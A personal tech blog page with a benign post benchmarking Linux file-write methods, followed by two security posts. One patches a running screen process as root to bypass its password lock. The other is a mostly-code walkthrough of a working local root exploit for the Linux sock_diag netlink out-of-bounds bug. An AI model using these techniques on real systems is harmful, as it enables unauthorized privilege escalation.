So you want to write to a file real fast…

Or: A tale about Linux file write patterns.

So I once wrote a custom core dump handler to be used with Linux’s

core_pattern. What it does is take a core dump on

STDIN plus a few arguments, and then write the core to a predictable

location on disk with a time stamp and suitable access rights. Core

dumps tend to be rather large, and in general you don’t know in

advance how much data you’ll write to disk. So I built a functionality

to write a chunk of data to disk (say, 16MB) and then check with

fstatfs() if the disk has still more than threshold capacity (say,

10GB). This way, a rapidly restarting and core-dumping application

cannot lead to “disk full” follow up failures that will inevitably

lead to a denial of service for most data handling services.
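The free-space check described above could look roughly like the following. This is only a minimal sketch: the name `has_free_space` and its return convention are my assumptions for illustration, not the code of the actual handler.

```c
#include <assert.h>
#include <fcntl.h>
#include <stdint.h>
#include <sys/vfs.h>
#include <unistd.h>

/* Hypothetical helper: returns 1 if the file system behind fd still has at
 * least `threshold` bytes available to unprivileged users, 0 if not, and -1
 * if fstatfs() fails. */
int has_free_space(int fd, uint64_t threshold)
{
    struct statfs st;

    if (fstatfs(fd, &st) == -1)
        return -1;

    /* f_bavail: free blocks usable by non-root; f_bsize: block size in bytes */
    uint64_t avail = (uint64_t) st.f_bavail * (uint64_t) st.f_bsize;

    return avail >= threshold;
}
```

A writer would call this after every chunk (say, every 16MB) and stop writing as soon as it returns 0.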

So… how do we write a lot of data to disk really fast? – Let us maybe

rephrase the question: How do we write data to disk in the first

place? Let’s assume we have already opened file descriptors in and

out, and we just want to copy everything from in to out.

One might be tempted to try something like this:

ssize_t read_write(int in, int out)

{

ssize_t n, t = 0;

char buf[1024];

while((n = read(in, buf, 1024)) > 0) {

t += write(out, buf, n);

}

return t;

}

“But…!”, you cry out, “there’s so much wrong with this!” And you are right, of course:

- The return value n is not checked. It might be -1. This might be because e.g. we have got a bad file descriptor, or because the syscall was interrupted.

- A call to write(out, buf, 1024) will – if it does not return -1 – write at least one byte, but we have no guarantee that we will actually write all n bytes to disk. So we have to loop the write until we have written n bytes.

An updated and semantically correct pattern reads like this (in a real program you’d have to do real error handling instead of assertions, of course):

ssize_t read_write_bs(int in, int out, ssize_t bs)

{

ssize_t w = 0, r = 0, t, n, m, off;

char *buf = malloc(bs);

assert(buf != NULL);

t = filesize(in);

while(r < t && (n = read(in, buf, bs))) {

if(n == -1) { assert(errno == EINTR); continue; }

r += n; /* total bytes read so far */

off = 0; /* bytes of the current chunk already written */

while(off < n && (m = write(out, buf + off, (n - off)))) {

if(m == -1) { assert(errno == EINTR); continue; }

off += m;

w += m; /* total bytes written so far */

}

}

free(buf);

return w;

}

We have a total number of bytes to read (t), the number of bytes

already read (r), and the number of bytes already written (w).

Only when t == r == w are we done (or if the input stream ends

prematurely). Error checking is performed so that we restart

interrupted syscalls and crash on real errors.
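For a real program, the inner write loop is probably worth factoring out with proper error reporting instead of assertions. A minimal sketch, assuming a helper I call `write_all` (the name and the return convention are mine):

```c
#include <assert.h>
#include <errno.h>
#include <string.h>
#include <unistd.h>

/* Hypothetical helper: write exactly len bytes or report failure.
 * Returns 0 on success, -1 on error with errno set by write(). */
int write_all(int fd, const void *buf, size_t len)
{
    const char *p = buf;

    while (len > 0) {
        ssize_t m = write(fd, p, len);

        if (m == -1) {
            if (errno == EINTR)
                continue;   /* interrupted before anything was written: retry */
            return -1;      /* real error: let the caller decide what to do */
        }
        p += m;             /* a short write just advances the cursor */
        len -= (size_t) m;
    }
    return 0;
}
```

The caller then only has to handle two outcomes per chunk, which keeps the outer read loop readable.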

What about the bs parameter? Of course you may have already noticed

in the first example that we always copied 1024 bytes. Typically, a

block on the file system is 4KB, so we are only writing quarter

blocks, which is likely bad for performance. So we’ll try different

block sizes and compare the results.

We can find out the file system’s block size like this (as usual, real error handling left out):

ssize_t block_size(int fd)

{

struct statfs st;

assert(fstatfs(fd, &st) != -1);

return (ssize_t) st.f_bsize;

}
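The filesize() helper used throughout these snippets is not shown in this post. A plausible sketch, assuming it is a thin wrapper around fstat() (this is my guess at its shape, not necessarily the benchmark's actual code):

```c
#include <assert.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed implementation of filesize(): size of the file behind fd in
 * bytes, or -1 if fstat() fails. */
ssize_t filesize(int fd)
{
    struct stat st;

    if (fstat(fd, &st) == -1)
        return -1;

    return (ssize_t) st.st_size;
}
```

Note that this only gives a useful answer for regular files. For a pipe such as the STDIN of a core dump handler, st_size says nothing about how much data will arrive.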

OK, let’s do some benchmarks! (Full code is on GitHub.) For simplicity I’ll try things on my laptop computer with Ext3+dmcrypt and an SSD. This is “read a 128MB file and write it out”, repeated for different block sizes, timing each version three times and printing the best time in the first column. In parentheses you’ll see the percentage increase in comparison to the best run of all methods:

read+write 16bs 164ms 191ms 206ms

read+write 256bs 167ms 168ms 187ms (+ 1.8%)

read+write 4bs 169ms 169ms 177ms (+ 3.0%)

read+write bs 184ms 191ms 200ms (+ 12.2%)

read+write 1k 299ms 317ms 329ms (+ 82.3%)

Mh. Seems like multiples of the FS’s block sizes don’t really matter here. In some runs, the 16x blocksize is best, sometimes it’s the 256x. The only obvious point is that writing only a single block at once is bad, and writing fractions of a block at once is very bad indeed performance-wise.
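The "run it three times and look at the best time" measurement can be sketched like this. The harness below is an illustration under my own assumptions (the names `best_of` and `count_call` are made up); the real benchmark code is the one on GitHub.

```c
#define _POSIX_C_SOURCE 200809L
#include <assert.h>
#include <time.h>

/* Hypothetical harness: run fn(arg) `runs` times and return the best
 * (smallest) wall-clock time in milliseconds. */
double best_of(int runs, void (*fn)(void *), void *arg)
{
    double best = -1.0;

    for (int i = 0; i < runs; i++) {
        struct timespec start, end;

        clock_gettime(CLOCK_MONOTONIC, &start);
        fn(arg);
        clock_gettime(CLOCK_MONOTONIC, &end);

        double ms = (end.tv_sec - start.tv_sec) * 1000.0
                  + (end.tv_nsec - start.tv_nsec) / 1e6;

        if (best < 0 || ms < best)
            best = ms;
    }
    return best;
}

/* Dummy workload for demonstration: counts how often it was called. */
void count_call(void *arg)
{
    ++*(int *) arg;
}
```

In the benchmark, the workload would be one of the copy functions wrapped so that it reopens the input and output files on each run.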

Now what’s there to improve? “Surely it’s the overhead of using

read() to get data,” I hear you saying, “Use mmap() for that!”

So we come up with this:

ssize_t mmap_write(int in, int out)

{

ssize_t w = 0, n;

size_t len;

char *p;

len = filesize(in);

p = mmap(NULL, len, PROT_READ, MAP_SHARED, in, 0);

assert(p != MAP_FAILED); /* mmap() signals failure with MAP_FAILED, not NULL */

while(w < len && (n = write(out, p + w, (len - w)))) {

if(n == -1) { assert(errno == EINTR); continue; }

w += n;

}

munmap(p, len);

return w;

}

Admittedly, the pattern is simpler. But, alas, it is even a little bit slower! (YMMV)

read+write 16bs 167ms 171ms 209ms

mmap+write 186ms 187ms 211ms (+ 11.4%)

“Surely copying around useless data is hurting performance,” I hear you say, “it’s 2014, use zero-copy already!” – OK. So basically there are two approaches for this on Linux: One cumbersome but rather old and known to work, and then there is the new and shiny sendfile interface.

For the splice

approach, since either reader or writer of your splice call must be

pipes (and in our case both are regular files), we need to create a

pipe solely for the purpose of splicing data from in to the write

end of the pipe, and then again splicing that same chunk from the read

end to the out fd:

ssize_t pipe_splice(int in, int out)

{

size_t bs = 65536;

ssize_t w = 0, r = 0, t, n, m;

int pipefd[2];

int flags = SPLICE_F_MOVE | SPLICE_F_MORE;

assert(pipe(pipefd) != -1);

t = filesize(in);

while(r < t && (n = splice(in, NULL, pipefd[1], NULL, bs, flags))) {

if(n == -1) { assert(errno == EINTR); continue; }

r += n;

while(w < r && (m = splice(pipefd[0], NULL, out, NULL, bs, flags))) {

if(m == -1) { assert(errno == EINTR); continue; }

w += m;

}

}

close(pipefd[0]);

close(pipefd[1]);

return w;

}

“This is not true zero copy!”, I hear you cry, and it’s true, the ‘page stealing’ mechanism has been discontinued as of 2007. So what we get is an “in-kernel memory copy”, but at least the file contents don’t cross the kernel/userspace boundary twice unnecessarily (we don’t inspect it anyway, right?).

The sendfile() approach is more immediate and clean:

ssize_t do_sendfile(int in, int out)

{

ssize_t t = filesize(in);

off_t ofs = 0;

while(ofs < t) {

if(sendfile(out, in, &ofs, t - ofs) == -1) {

assert(errno == EINTR);

continue;

}

}

return t;

}

So… do we get an actual performance gain?

sendfile 159ms 168ms 175ms

pipe+splice 161ms 162ms 163ms (+ 1.3%)

read+write 16bs 164ms 165ms 178ms (+ 3.1%)

“Yes! I knew it!” you say. But I’m lying here. Every time I execute

the benchmark, another different approach is the fastest. Sometimes

the read/write approach comes in first before the two others. So it

seems that this is not really a performance saver, is it? I like the

sendfile() semantics, though. But beware:

In Linux kernels before 2.6.33, out_fd must refer to a socket. Since Linux 2.6.33 it can be any file. If it is a regular file, then sendfile() changes the file offset appropriately.

Strangely, sendfile() works on regular files in the default Debian

Squeeze Kernel (2.6.32-5) without problems. (Update 2015-01-17:

Przemysław Pawełczyk, who in 2011 sent Changli Gao’s patch which

re-enables this behaviour to stable@kernel.org for inclusion in Linux

2.6.32, wrote to me explaining how exactly it ended up being

backported. If you’re interested, see this excerpt from his

email.)
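If you cannot be sure that the running kernel accepts a regular file as out_fd, one option is to fall back to plain read/write when sendfile() refuses to work. The sendfile(2) manual page suggests doing this for EINVAL and ENOSYS. A minimal sketch, with hypothetical function names of my own choosing:

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <sys/sendfile.h>
#include <sys/types.h>
#include <unistd.h>

/* Plain read/write loop used as the fallback path. */
static ssize_t copy_read_write(int in, int out)
{
    char buf[65536];
    ssize_t n, total = 0;

    while ((n = read(in, buf, sizeof buf)) != 0) {
        if (n == -1) {
            if (errno == EINTR) continue;
            return -1;
        }
        for (ssize_t w = 0; w < n; ) {
            ssize_t m = write(out, buf + w, (size_t) (n - w));
            if (m == -1) {
                if (errno == EINTR) continue;
                return -1;
            }
            w += m;
        }
        total += n;
    }
    return total;
}

/* Hypothetical wrapper: copy len bytes with sendfile(); if the very first
 * call is refused with EINVAL or ENOSYS, fall back to read/write. */
ssize_t copy_with_fallback(int in, int out, size_t len)
{
    size_t done = 0;

    while (done < len) {
        /* NULL offset: use and advance the file offset of `in` */
        ssize_t n = sendfile(out, in, NULL, len - done);

        if (n == -1) {
            if (errno == EINTR) continue;
            if (done == 0 && (errno == EINVAL || errno == ENOSYS))
                return copy_read_write(in, out);
            return -1;
        }
        if (n == 0)
            break;              /* input ended early */
        done += (size_t) n;
    }
    return (ssize_t) done;
}
```

Passing NULL as the offset keeps the file position of the input in sync, so the fallback can continue from where sendfile() would have started.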

“But,” I hear you saying, “the system has no clue what your intentions are, give it a few hints!” and you are probably right, that shouldn’t hurt:

void advice(int in, int out)

{

ssize_t t = filesize(in);

posix_fadvise(in, 0, t, POSIX_FADV_WILLNEED);

posix_fadvise(in, 0, t, POSIX_FADV_SEQUENTIAL);

}

But since the file is very probably fully cached, the performance is not improved significantly. “BUT you should supply a hint on how much you will write, too!” – And you are right. And this is where the story branches off into two cases: Old and new file systems.

I’ll just tell the kernel that I want to write t bytes to disk now,

and please reserve space (I don’t care about a “disk full” that I

could catch and act on):

void do_falloc(int in, int out)

{

ssize_t t = filesize(in);

posix_fallocate(out, 0, t);

}

I’m using my workstation’s SSD with XFS now (not my laptop any more). Suddenly everything is much faster, so I’ll simply run the benchmarks on a 512MB file so that it actually takes time:

sendfile + advices + falloc 205ms 208ms 208ms

pipe+splice + advices + falloc 207ms 209ms 210ms (+ 1.0%)

sendfile 226ms 226ms 229ms (+ 10.2%)

pipe+splice 227ms 227ms 231ms (+ 10.7%)

read+write 16bs + advices + falloc 235ms 240ms 240ms (+ 14.6%)

read+write 16bs 258ms 259ms 263ms (+ 25.9%)

Wow, so this posix_fallocate() thing is a real improvement! It seems

reasonable enough, of course: Already the file system can prepare an

– if possible contiguous – sequence of blocks in the requested size. But

wait! What about Ext3? Back to the laptop:

sendfile 161ms 171ms 194ms

read+write 16bs 164ms 174ms 189ms (+ 1.9%)

pipe+splice 167ms 170ms 178ms (+ 3.7%)

read+write 16bs + advices + falloc 224ms 229ms 229ms (+ 39.1%)

pipe+splice + advices + falloc 229ms 239ms 241ms (+ 42.2%)

sendfile + advices + falloc 232ms 235ms 249ms (+ 44.1%)

Bummer. That was unexpected. Why is that? Let’s check strace while

we execute this program:

fallocate(1, 0, 0, 134217728) = -1 EOPNOTSUPP (Operation not supported)

...

pwrite(1, "\0", 1, 4095) = 1

pwrite(1, "\0", 1, 8191) = 1

pwrite(1, "\0", 1, 12287) = 1

pwrite(1, "\0", 1, 16383) = 1

...

What? Who does this? – Glibc does this! It sees the syscall fail and re-creates the semantics by hand. (Beware, Glibc code follows. Safe to skip if you want to keep your sanity.)

/* Reserve storage for the data of the file associated with FD. */

int

posix_fallocate (int fd, __off_t offset, __off_t len)

{

#ifdef __NR_fallocate

# ifndef __ASSUME_FALLOCATE

if (__glibc_likely (__have_fallocate >= 0))

# endif

{

INTERNAL_SYSCALL_DECL (err);

int res = INTERNAL_SYSCALL (fallocate, err, 6, fd, 0,

__LONG_LONG_PAIR (offset >> 31, offset),

__LONG_LONG_PAIR (len >> 31, len));

if (! INTERNAL_SYSCALL_ERROR_P (res, err))

return 0;

# ifndef __ASSUME_FALLOCATE

if (__glibc_unlikely (INTERNAL_SYSCALL_ERRNO (res, err) == ENOSYS))

__have_fallocate = -1;

else

# endif

if (INTERNAL_SYSCALL_ERRNO (res, err) != EOPNOTSUPP)

return INTERNAL_SYSCALL_ERRNO (res, err);

}

#endif

return internal_fallocate (fd, offset, len);

}

And you guessed it, internal_fallocate() just does a one-byte pwrite()

into every block (the strace output above shows the last byte of each

4096-byte block being written) until the space requirement is

fulfilled. This is slowing things down considerably. This is bad. –

“But other people just truncate the file! I saw this!”, you interject, and again you are right.

void enlarge_truncate(int in, int out)

{

ssize_t t = filesize(in);

ftruncate(out, t);

}

Indeed the truncate versions work faster on Ext3:

pipe+splice + advices + trunc 157ms 158ms 160ms

read+write 16bs + advices + trunc 158ms 167ms 188ms (+ 0.6%)

sendfile + advices + trunc 164ms 167ms 181ms (+ 4.5%)

sendfile 164ms 171ms 193ms (+ 4.5%)

pipe+splice 166ms 167ms 170ms (+ 5.7%)

read+write 16bs 178ms 185ms 185ms (+ 13.4%)

Alas, not on XFS. There, the fallocate() system call is just more

performant. (You can also use xfsctl directly for that.) –

And this is where the story ends.

In place of a sweeping conclusion, I’m a little bit disappointed that

there seems to be no general semantics to say “I’ll write n bytes

now, please be prepared”. Obviously, using posix_fallocate() on Ext3

hurts very much (this may be why cp is not employing it). So I guess

the best solution is still something like this:

if(fallocate(out, 0, 0, len) == -1 && errno == EOPNOTSUPP)

ftruncate(out, len);
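Wrapped into a function with a return value, the same idea might look like the sketch below. The name `reserve_space` is hypothetical, and I am assuming that any error other than EOPNOTSUPP should be reported to the caller.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical wrapper: returns 0 on success, -1 on error (errno set). */
int reserve_space(int fd, off_t len)
{
    /* Use fallocate() rather than posix_fallocate(), so that glibc cannot
     * emulate the call with one pwrite() per block. */
    if (fallocate(fd, 0, 0, len) == 0)
        return 0;

    if (errno != EOPNOTSUPP)
        return -1;

    /* The file system cannot preallocate: only set the file size. */
    return ftruncate(fd, len);
}
```

Keep in mind that the ftruncate() branch merely creates a sparse file of the right size. It does not reserve any blocks, so a later "disk full" is still possible.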

Maybe you have another idea how to speed up the writing process? Then drop me an email, please.

Update 2014-05-03: Coming back after a couple of days’ vacation, I found the post was on HackerNews and generated some 23k hits here. I corrected the small mistake in example 2 (as pointed out in the comments – thanks!). – I trust that the diligent reader will have noticed that this is not a complete survey of either I/O hierarchy, file system and/or hard drive performance. It is, as the subtitle should have made clear, a “tale about Linux file write patterns”.

Update 2014-06-09: Sebastian pointed out an error

in the mmap write pattern (the write should start at p + w, not at p).

Also, the basic read/write pattern contained a subtle error. Tricky business –

Thanks!

Locking a screen session

The famous screen program – luckily by now mostly obsolete thanks to tmux – has a feature to “password lock” a session. The manual:

This is useful if you have privileged programs running under screen and you want to protect your session from reattach attempts by another user masquerading as your uid (i.e. any superuser.)

This is of course utter crap. As the super user, you can do anything you like, including changing a program’s executable at run time, which I want to demonstrate for screen as a POC.

The password is checked on the server side (which usually runs with setuid root) here:

if (strncmp(crypt(pwdata->buf, up), up, strlen(up))) {

...

AddStr("\r\nPassword incorrect.\r\n");

...

}

If I am root, I can patch the running binary. Ultimately, I want to circumvent this password check. But we need to do some preparation:

First, find the string about the incorrect password that is passed to

AddStr. Since this is a compile-time constant, it is stored in the

.rodata section of the ELF.

Just fire up GDB on the screen binary, list the sections (redacted for brevity here)…

(gdb) maintenance info sections

Exec file:

`/usr/bin/screen', file type elf64-x86-64.

...

0x00403a50->0x0044ee8c at 0x00003a50: .text ALLOC LOAD READONLY CODE HAS_CONTENTS

0x0044ee8c->0x0044ee95 at 0x0004ee8c: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS

0x0044eea0->0x00458a01 at 0x0004eea0: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS

...

… and search for said string in the .rodata section:

(gdb) find 0x0044eea0, 0x00458a01, "\r\nPassword incorrect.\r\n"

0x45148a

warning: Unable to access target memory at 0x455322, halting search.

1 pattern found.

Now, we need to locate the piece of code comparing the password. Let’s

first search for the call to AddStr by taking advantage of the fact

that we know the address of the string that will be passed as the

argument. We search in .text for the address of the string:

(gdb) find 0x00403a50, 0x0044ee8c, 0x45148a

0x41b371

1 pattern found.

Now there should be a jne instruction shortly before that (this

instruction stands for “jump if not equal” and has the opcode 0x75).

Let’s search for it:

(gdb) find/b 0x41b371-0x100, +0x100, 0x75

0x41b2f2

1 pattern found.

Decode the instruction:

(gdb) x/i 0x41b2f2

0x41b2f2: jne 0x41b370

This is it. (If you want to be sure, search the instructions before

that. Shortly before that, at 0x41b2cb, I find: callq 403120 <strncmp@plt>.)

Now we can simply patch the live binary, changing 0x75 to 0x74 (jne

to je or “jump if equal”), thus effectively inverting the if

expression. Find the screen server process (it’s written in all caps

in the ps output, i.e. SCREEN) and patch it like this, where

=(cmd) is a Z-Shell shortcut for “create temporary file and delete

it after the command finishes”:

$ sudo gdb -batch -p 23437 -x =(echo "set *(unsigned char *)0x41b2f2 = 0x74\nquit")

All done. Just attach using screen -x, but be sure not to enter

the correct password: That’s the only one that will not give you

access now.
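Why does changing a single bit suffice? On x86, the short conditional jumps occupy the opcodes 0x70 to 0x7f, and the lowest bit selects the negated condition. The following small sketch (the function name is made up for illustration) expresses the 0x75 to 0x74 change as a bit flip:

```c
#include <assert.h>

/* Short conditional jumps on x86 use the opcodes 0x70..0x7f; toggling the
 * lowest bit negates the condition, e.g. jne (0x75) <-> je (0x74).
 * Any other byte is returned unchanged. */
unsigned char invert_short_jcc(unsigned char opcode)
{
    if ((opcode & 0xf0) == 0x70)
        return opcode ^ 0x01;

    return opcode;
}
```

The jump displacement in the following byte stays untouched, which is why the patch does not need to move any code around.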

Privilege Escalation Kernel Exploit

So my friend Nico tweeted that there is an „easy linux kernel privilege escalation“ and pointed to a fix from three days ago. If that’s so easy, I thought, then I’d like to try: And thus I wrote my first Kernel exploit. I will share some details here. I guess it is pointless to withhold the details or a fully working exploit, since some Russians have already had an exploit for several months, and there seem to be several similar versions flying around the net, I discovered later. They differ in technique and reliability, and I guess others can do better than me.

I have no clue what the NetLink subsystem really is, but never mind. The commit description for the fix says:

Userland can send a netlink message requesting SOCK_DIAG_BY_FAMILY with a family greater or equal then AF_MAX -- the array size of sock_diag_handlers[]. The current code does not test for this condition therefore is vulnerable to an out-of-bound access opening doors for a privilege escalation.

So we should do exactly that! One of the hardest parts was actually

finding out how to send such a NetLink message, but I’ll come to that

later. Let’s first have a look at the code that was patched (this is

from net/core/sock_diag.c):

static int __sock_diag_rcv_msg(struct sk_buff *skb, struct nlmsghdr *nlh)

{

int err;

struct sock_diag_req *req = nlmsg_data(nlh);

const struct sock_diag_handler *hndl;

if (nlmsg_len(nlh) < sizeof(*req))

return -EINVAL;

/* check for "req->sdiag_family >= AF_MAX" goes here */

hndl = sock_diag_lock_handler(req->sdiag_family);

if (hndl == NULL)

err = -ENOENT;

else

err = hndl->dump(skb, nlh);

sock_diag_unlock_handler(hndl);

return err;

}

The function sock_diag_lock_handler() locks a mutex and effectively

returns sock_diag_handlers[req->sdiag_family], i.e. the unsanitized

family number received in the NetLink request. Since AF_MAX is 40,

we can effectively return memory from after the end of

sock_diag_handlers (“out-of-bounds access”) if we specify a family

greater or equal to 40. This memory is accessed as a

struct sock_diag_handler {

__u8 family;

int (*dump)(struct sk_buff *skb, struct nlmsghdr *nlh);

};

… and err = hndl->dump(skb, nlh); calls the function pointed to in

the dump field.
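To make the missing check concrete, here is a small userland model of a handler table with the bounds check in place. All names carrying a `_model` suffix, as well as `register_handler` and `lookup_handler`, are stand-ins of mine and not kernel code; the point is only where the comparison against the array size has to happen.

```c
#include <assert.h>
#include <stddef.h>

#define AF_MAX_MODEL 40   /* stand-in for the kernel's AF_MAX at the time */

struct handler_model {
    unsigned char family;
    int (*dump)(void);
};

static const struct handler_model *handlers_model[AF_MAX_MODEL];

/* Register a handler; refuses families outside the table and taken slots. */
int register_handler(const struct handler_model *h)
{
    if (h->family >= AF_MAX_MODEL || handlers_model[h->family] != NULL)
        return -1;

    handlers_model[h->family] = h;
    return 0;
}

/* Model of the patched lookup: reject any family that would index past the
 * end of the table instead of reading whatever happens to be stored there. */
const struct handler_model *lookup_handler(unsigned int family)
{
    if (family >= AF_MAX_MODEL)
        return NULL;    /* the fixed kernel bails out at this point */

    return handlers_model[family];
}
```

Without the first if statement in lookup_handler(), a family of 40 or more would return memory that merely happens to follow the array, which is exactly the situation described above.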

So we know: The Kernel follows a pointer to a sock_diag_handler

struct, and calls the function stored there. If we find some

suitable and (more or less) predictable value after the end of the

array, then we might store a specially crafted struct at the

referenced address that contains a pointer to some code that will

escalate the privileges of the current process. The main function

looks like this:

int main(int argc, char **argv)

{

prepare_privesc_code();

spray_fake_handler((void *)0x0000000000010000);

trigger();

return execv("/bin/sh", (char *[]) { "sh", NULL });

}

First, we need to store some code that will escalate the privileges. I found these slides and this ksplice blog post helpful for that, since I’m not keen on writing assembly.

/* privilege escalation code */

#define KERNCALL __attribute__((regparm(3)))

void * (*prepare_kernel_cred)(void *) KERNCALL;

void * (*commit_creds)(void *) KERNCALL;

/* match the signature of a sock_diag_handler dumper function */

int privesc(struct sk_buff *skb, struct nlmsghdr *nlh)

{

commit_creds(prepare_kernel_cred(0));

return 0;

}

/* look up an exported Kernel symbol */

void *findksym(const char *sym)

{

void *p, *ret;

FILE *fp;

char s[1024];

size_t sym_len = strlen(sym);

fp = fopen("/proc/kallsyms", "r");

if(!fp)

err(-1, "cannot open kallsyms: fopen");

ret = NULL;

while(fscanf(fp, "%p %*c %1023s\n", &p, s) == 2) { /* 1023 leaves room for the NUL in s[1024] */

if(!!strncmp(sym, s, sym_len))

continue;

ret = p;

break;

}

fclose(fp);

return ret;

}

void prepare_privesc_code(void)

{

prepare_kernel_cred = findksym("prepare_kernel_cred");

commit_creds = findksym("commit_creds");

}

This is pretty standard, and you’ll find many variations of that in different exploits.

Now we spray a struct containing this function pointer over a sizable amount of memory:

void spray_fake_handler(const void *addr)

{

void *pp;

int po;

/* align to page boundary */

pp = (void *) ((ulong)addr & ~0xfffULL);

pp = mmap(pp, 0x10000, PROT_READ | PROT_WRITE | PROT_EXEC,

MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, -1, 0);

if(pp == MAP_FAILED)

err(-1, "mmap");

struct sock_diag_handler hndl = { .family = AF_INET, .dump = privesc };

for(po = 0; po < 0x10000; po += sizeof(hndl))

memcpy(pp + po, &hndl, sizeof(hndl));

}

The memory is mapped with MAP_FIXED, which makes mmap() take the

memory location as the de facto location, not merely a hint. The

location must be a multiple of the page size (which is 4096 or 0x1000

by default), and on most modern systems you cannot map the zero-page

(or other low pages), consult sysctl vm.mmap_min_addr for this.

(This is to foil attempts to map code to the zero-page to take

advantage of a Kernel NULL pointer dereference.)

Now for the actual trigger. To get an idea of what we can do, we

should first inspect what comes after the sock_diag_handlers array

in the currently running Kernel (this is only possible with root

permissions). Since the array is static to that file, we cannot look up

the symbol. Instead, we look up the address of a function that

accesses said array, sock_diag_register():

$ grep -w sock_diag_register /proc/kallsyms

ffffffff812b6aa2 T sock_diag_register

If this returns all zeroes, try grepping in /boot/System.map-$(uname -r)

instead. Then disassemble the function. I annotated the relevant

points with the corresponding C code:

$ sudo gdb -c /proc/kcore

(gdb) x/23i 0xffffffff812b6aa2

0xffffffff812b6aa2: push %rbp

0xffffffff812b6aa3: mov %rdi,%rbp

0xffffffff812b6aa6: push %rbx

0xffffffff812b6aa7: push %rcx

0xffffffff812b6aa8: cmpb $0x27,(%rdi) ; if (hndl->family >= AF_MAX)

0xffffffff812b6aab: ja 0xffffffff812b6ae5

0xffffffff812b6aad: mov $0xffffffff81668c20,%rdi

0xffffffff812b6ab4: mov $0xfffffff0,%ebx

0xffffffff812b6ab9: callq 0xffffffff813628ee ; mutex_lock(&sock_diag_table_mutex);

0xffffffff812b6abe: movzbl 0x0(%rbp),%eax

0xffffffff812b6ac2: cmpq $0x0,-0x7e7fe930(,%rax,8) ; if (sock_diag_handlers[hndl->family])

0xffffffff812b6acb: jne 0xffffffff812b6ad7

0xffffffff812b6acd: mov %rbp,-0x7e7fe930(,%rax,8) ; sock_diag_handlers[hndl->family] = hndl;

0xffffffff812b6ad5: xor %ebx,%ebx

0xffffffff812b6ad7: mov $0xffffffff81668c20,%rdi

0xffffffff812b6ade: callq 0xffffffff813628db

0xffffffff812b6ae3: jmp 0xffffffff812b6aea

0xffffffff812b6ae5: mov $0xffffffea,%ebx

0xffffffff812b6aea: pop %rdx

0xffffffff812b6aeb: mov %ebx,%eax

0xffffffff812b6aed: pop %rbx

0xffffffff812b6aee: pop %rbp

0xffffffff812b6aef: retq

The syntax cmpq $0x0,-0x7e7fe930(,%rax,8) means: check if the value

at the address -0x7e7fe930 (which is a shorthand for

0xffffffff818016d0 on my system) plus 8 times %rax is zero – eight

being the size of a pointer on a 64-bit system, and %rax holding the

family field, which the preceding movzbl instruction loaded from the

first byte of the struct that the function's first argument points to

(the pointer itself was saved in %rbp). So this line is an array

access, and we know that sock_diag_handlers is located at -0x7e7fe930.
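The "shorthand" is simply a 32-bit displacement that the CPU sign-extends to 64 bits. If you want to double-check the arithmetic, a few lines of C will do. The helper names are mine, chosen for illustration:

```c
#include <assert.h>
#include <stdint.h>

/* Sign-extend a 32-bit displacement to the 64-bit address it denotes. */
uint64_t disp_to_addr(int32_t disp)
{
    return (uint64_t) (int64_t) disp;
}

/* Address of slot `index` in an array of 8-byte pointers starting at base,
 * i.e. what the addressing mode disp(,%rax,8) computes. */
uint64_t slot_addr(uint64_t base, uint64_t index)
{
    return base + index * sizeof(uint64_t);
}
```

With the values from my system, disp_to_addr(-0x7e7fe930) yields 0xffffffff818016d0, the start of the array.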

(All these steps can actually be done without root permissions: You

can unpack the Kernel with something like k=/boot/vmlinuz-$(uname -r)

&& dd if=$k bs=1 skip=$(perl -e 'read STDIN,$k,1024*1024; print

index($k, "\x1f\x8b\x08\x00");' <$k) | zcat >| vmlinux and start

GDB on the resulting ELF file. Only now you actually need to inspect

the main memory.)

(gdb) x/46xg -0x7e7fe930

0xffffffff818016d0: 0x0000000000000000 0x0000000000000000

0xffffffff818016e0: 0x0000000000000000 0x0000000000000000

0xffffffff818016f0: 0x0000000000000000 0x0000000000000000

0xffffffff81801700: 0x0000000000000000 0x0000000000000000

0xffffffff81801710: 0x0000000000000000 0x0000000000000000

0xffffffff81801720: 0x0000000000000000 0x0000000000000000

0xffffffff81801730: 0x0000000000000000 0x0000000000000000

0xffffffff81801740: 0x0000000000000000 0x0000000000000000

0xffffffff81801750: 0x0000000000000000 0x0000000000000000

0xffffffff81801760: 0x0000000000000000 0x0000000000000000

0xffffffff81801770: 0x0000000000000000 0x0000000000000000

0xffffffff81801780: 0x0000000000000000 0x0000000000000000

0xffffffff81801790: 0x0000000000000000 0x0000000000000000

0xffffffff818017a0: 0x0000000000000000 0x0000000000000000

0xffffffff818017b0: 0x0000000000000000 0x0000000000000000

0xffffffff818017c0: 0x0000000000000000 0x0000000000000000

0xffffffff818017d0: 0x0000000000000000 0x0000000000000000

0xffffffff818017e0: 0x0000000000000000 0x0000000000000000

0xffffffff818017f0: 0x0000000000000000 0x0000000000000000

0xffffffff81801800: 0x0000000000000000 0x0000000000000000

0xffffffff81801810: 0x0000000000000000 0x0000000000000000

0xffffffff81801820: 0x000000000000000a 0x0000000000017570

0xffffffff81801830: 0xffffffff8135a666 0xffffffff816740a0

(gdb) p (0xffffffff81801828- -0x7e7fe930)/8

$1 = 43

So now I know that in the Kernel I’m currently running, at the current

moment, sock_diag_handlers[43] is 0x0000000000017570, which is a

low address, but hopefully not too low. (Nico reported 0x17670, and a

current grml live cd in KVM

has 0x17470 there.) So we need to send a NetLink message with

SOCK_DIAG_BY_FAMILY type set in the header, flags at least

NLM_F_REQUEST and the family set to 43. This is what the trigger

does:

void trigger(void)

{

int nl = socket(PF_NETLINK, SOCK_RAW, 4 /* NETLINK_SOCK_DIAG */);

if (nl < 0)

err(-1, "socket");

struct {

struct nlmsghdr hdr;

struct sock_diag_req r;

} req;

memset(&req, 0, sizeof(req));

req.hdr.nlmsg_len = sizeof(req);

req.hdr.nlmsg_type = SOCK_DIAG_BY_FAMILY;

req.hdr.nlmsg_flags = NLM_F_REQUEST;

req.r.sdiag_family = 43; /* guess right offset */

if(send(nl, &req, sizeof(req), 0) < 0)

err(-1, "send");

}

